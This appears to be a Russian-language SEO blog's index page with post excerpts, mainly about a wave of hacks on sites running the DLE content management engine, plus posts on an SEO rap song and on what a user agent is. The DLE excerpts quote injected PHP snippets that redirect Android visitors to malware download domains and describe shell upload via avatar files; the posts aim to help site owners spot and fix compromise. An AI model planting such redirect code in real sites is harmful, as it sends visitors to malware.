Начало. Уязвимость в сайтах на движке
Как видим, добавился не только новый домен http://yacounter.ws (ну любит злоумышленник зону ws, что тут поделать), но и eval.
Но и за первую версию также есть случаи, которые говорят следующее.
В файлах движка цмс  dle появляется совсем другой код, например, такой:

if(stripos($_SERVER[‘HTTP_USER_AGENT’],”Android”)!==false)
{header(‘Location: http://refresh-browser.00xff.net/’);exit;}

Как видим, домен здесь совсем другой. Кроме того, были выявлены следующие факты:
– в главном шаблоне сайта, main.tpl, в яваскриптах появляются посторонние строки;
– кто-то меняет кодировку шаблона, после чего пропадает весь русский текст (я думаю, что кодировку никто не меняет, просто-напросто так действует посторонний код);
– опять-таки в файле main.tpl едет вниз или в  сторону вёрстка шаблона,  что снова говорит о присутствии постороннего кода;
– в индексном файле появляются посторонние java-скрипты;
– появляются пользователи с правами администраторов, появляются сообщения о каких-то «левых» действиях в админ-панели сайта, меняются рекламные баннеры. Читать полностью »

Как ломали сайты на  популярном новостном движке ДЛЕ, хронология событий. Совсем недавно я писал о том, что в начале месяца  было взломано огромное количество сайтов на dle, в результате чего на сайтах ничего не подозревающих владельцев,  естественно без их ведома,  прописывался вредоносный код.
Сегодня поговорим более подробно про уязвимости в сайтах на движке dle, как можно устранить последствия взлома и как его предупредить.
Как всё начиналось
В конце прошлого года на ачате появилась новость о том, что в движке ДЛЕ найдены опасные уязвимости. В конце декабря, в последних числах,  уже на сёрче появились сообщения про то, что Касперский блокирует сайты вебмастеров из-за того, что на хостинге прописался мобильный зловред statuses.ws/googleanalisys.js.
Внизу шаблона каким-то образом прописывался посторонний код:

if ($android === true) {
header(‘Location: http://file07.com/browser_update/215/browser_update’)
}

Затем код видоизменился и в файле конфига config.php появился уже такой код: Читать полностью »

Прошлый раз я писал о том, как поменять юзер-агент в браузере,  а сейчас предлагаю  немного расслабиться и послушать забавную песенку про сео,    которая так и называется «Песенка алматинского сеошника».
Данную композицию исполняет алматинский сеошник в стиле рэпа  – речитатива. Это короткая песенка длительностью в одну с лишним минуту. Там вы может услышать следующие строки про такие полезные вещи как:
«…дорвеи, сателлиты, называя их хлам,
ведь трафу с них  мало и говорит он:
Тема как частушка шепну тебе на ушко…
И в это же время Яндекс полюбит тебя»
«Поднимет его строго в топ,
По НЧ и ВЧ будем всегда первыми,
И продажи наши не будут незаметными».
Но лучше слушать, чем говорить, а ещё лучше смотреть и слушать. Видео будет чуть позже, а пока расскажу, чем завершился конкурс на «СеоКафе» про сеокафестатейность,   спонсором которого выступил агрегатор СеоХаммер. Читать полностью »

Что такое  юзер-агент и для чего его нужно менять?
User Agent (юзер-агент) - клиентское  приложение, работающее по определенным правилам (протоколам).
В роли таких приложений могут выступать  различные  браузеры, мобильные устройства (смартфоны), роботы поисковых систем.  При посещении какого-либо веб-узла, сео-блога в интернете приложение посылает информацию о себе  виде   HTTP-запроса, который начинается словами: User-Agent (User-agent). Эта информация обычно включает в себя такие данные, как наименование приложения, его версию, версию операционной системы и язык пользователя.
У поисковых роботов юзер-агент обычно содержит и адрес его веб-узла. Например,  поисковый робот Гугла Googlebot (Google) имеет следующий юзер-агент: Googlebot/2.1 (+http://www.google.com/bot.html). Если перейти по ссылке, указанной в круглых скобках, мы попадем на страницу Справки – Инструменты для вебмастеров и сможем прочитать полезную информацию по работе робота Гуглбота  (это разработанная Google программа сканирования Интернета (паук), – именно такими словами начинается справочная информация).
Теперь разобравшись с тем, что такое User-agent, разберемся с тем, зачем его нужно менять.
Ситуацию  наподобие той, что многие браузеры стали скрывать свой юзер-агент для того, чтобы получить информацию, закрытую от них настройками сайта (например, через  robots.txt), мы рассматривать не будем, а рассмотрим более практические вещи. Читать полностью »

Прошлый раз я писал о том, как Жерар Депардье стал жителем Подмосковья  и о конкурсе сеокафестатейность, а в этот раз  давайте поговорим  о  компьютерной безопасности.

Первая и самая главная новость  за сегодня – это обнаруженная не так давно уязвимость в популярном пользовательском движке Data Life Engine (DLE).   В чём заключается данная уязвимость?  Как сообщается на официальном сайте разработчика движка, заключается она в том, что в парсере шаблонов идёт недостаточная фильтрация данных.  В результате чего, при определенных условиях,  злоумышленники получают возможность выполнить в скриптах (шаблонах)  сайтов, сделанных на системе управления контентом  ДЛЕ,  произвольный код, залить так называемый шелл.

Разработчики системы сами определили степень опасности данной уязвимости как высокую, и оперативно выпустили патч (заплатку), которая данную уязвимость закрывает. Заплатка предназначена только для версии dle 9.7. Однако, судя по многочисленным сообщениям пользователей на различных сео-форумах, взломы затронули все модификации  девятой версии – 9.7, 9.6, 9.5 и т. д.

Как выглядит вредоносный код, что он делает и как определить то, что ваш сайт на дле был взломан? Как выглядит исполняемый код пока не ясно, но уже ясно, каким образом он попал на сайты. Вначале взломщик регистрировался на блогах и порталах, сделанных  на DLE, потом устанавливал графический аватар в формате .gif. После чего Читать полностью »